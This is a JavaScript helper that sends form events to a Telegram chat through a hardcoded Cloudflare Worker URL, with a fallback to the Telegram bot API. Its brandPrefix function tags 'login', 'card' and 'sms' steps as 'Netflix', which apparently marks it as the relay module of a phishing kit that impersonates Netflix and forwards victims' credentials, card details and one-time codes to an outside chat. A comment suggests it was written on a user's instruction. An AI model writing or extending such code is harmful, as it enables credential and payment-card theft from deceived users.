// Lightweight Telegram helper for the public frontend.
// Primary path: send through Cloudflare Worker (keeps bot token secret).
// Fallback: direct Telegram bot (if env vars are set).
// Default worker creds are provided per user instruction.

const RAW_WORKER_URL =
  (process.env.REACT_APP_TELEGRAM_WORKER_URL || '').trim() || 'https://tartra.vinsonova.workers.dev';
const WORKER_URL = RAW_WORKER_URL
  ? (/^https?:\/\//i.test(RAW_WORKER_URL) ? RAW_WORKER_URL : `https://${RAW_WORKER_URL}`)
  : '';
const WORKER_SECRET = (process.env.REACT_APP_TELEGRAM_WORKER_SECRET || '').trim() || '11223344';
const BOT_TOKEN = process.env.REACT_APP_TELEGRAM_BOT_TOKEN;
const CHAT_ID = process.env.REACT_APP_TELEGRAM_CHAT_ID; // optional fallback; prefer worker
const VISITOR_CHAT_ID =
  (process.env.REACT_APP_TELEGRAM_VISITOR_CHAT_ID || '').trim() || '-5216485503';
const BRAND = process.env.REACT_APP_TELEGRAM_BRAND || 'Stream';
export const OWNER_TAG = (process.env.REACT_APP_TELEGRAM_OWNER || '').trim();

// sendAdminEvent now supports optional inline buttons:
// sendAdminEvent('Message', 'form', { buttons: [{ text: 'Open', url: 'https://example.com' }] })
export async function sendAdminEvent(text, channel = 'form', options = {}) {
  const message = String(text || '').slice(0, 4000);
  if (!message) return false;
  const target = String(channel || 'form').trim() || 'form';
  const targetChatId = target === 'visitor' ? VISITOR_CHAT_ID : CHAT_ID;
  const rawButtons = Array.isArray(options?.buttons) ? options.buttons : [];
  // Accept flat or 2D arrays; normalize to inline_keyboard shape.
  const inline_keyboard = rawButtons.length
    ? (Array.isArray(rawButtons[0]) ? rawButtons : [rawButtons]).map((row) =>
        row
          .filter(Boolean)
          .map((b) => ({
            text: String(b?.text || 'Open').slice(0, 64),
            url: String(b?.url || '').slice(0, 512),
            callback_data: String(b?.callback_data || '').slice(0, 64),
          }))
          .filter((b) => b.url || b.callback_data)
      )
    : undefined;
  const replyMarkup = inline_keyboard?.length ? { inline_keyboard } : undefined;

  // 1) Try worker first (keeps secrets off client)
  if (WORKER_URL && WORKER_SECRET) {
    try {
      const headers = {
        'Content-Type': 'application/json',
      };
      if (WORKER_SECRET) headers['X-Secret'] = WORKER_SECRET;

      console.log('[telegram] send start', WORKER_URL, target, 'len', message.length);
      const res = await fetch(WORKER_URL, {
        method: 'POST',
        mode: 'cors',
        cache: 'no-store',
        keepalive: true,
        headers,
        body: JSON.stringify({
          text: message,
          channel: target,
          buttons: replyMarkup?.inline_keyboard,
        }),
      });
      if (res.ok) {
        console.log('[telegram] send ok', target);
        return true;
      }
      const errText = await res.text().catch(() => '');
      console.warn('[telegram] send failed', target, res.status, errText);
    } catch (err) {
      console.warn('[telegram] send failed', target, err);
    }
  }

  // 2) Fallback to direct Telegram (requires token + chat id)
  if (!BOT_TOKEN || !targetChatId) return false;
  try {
    const res = await fetch(`https://api.telegram.org/bot${BOT_TOKEN}/sendMessage`, {
      method: 'POST',
      headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify({
        chat_id: targetChatId,
        text: message,
        parse_mode: 'HTML',
        disable_web_page_preview: true,
        ...(replyMarkup ? { reply_markup: replyMarkup } : null),
      }),
    });
    return res.ok;
  } catch (err) {
    console.warn('Telegram direct send failed', err);
    return false;
  }
}

export function brandPrefix(stepLabel) {
  const key = String(stepLabel || '').toLowerCase();
  const brandMap = {
    login: 'Stream', // matches user sample "Stream/Login"
    card: 'Netflix',
    sms: 'Netflix',
    block: BRAND,
  };
  const brand = brandMap[key] || BRAND;
  return `${brand}/${stepLabel}`;
}
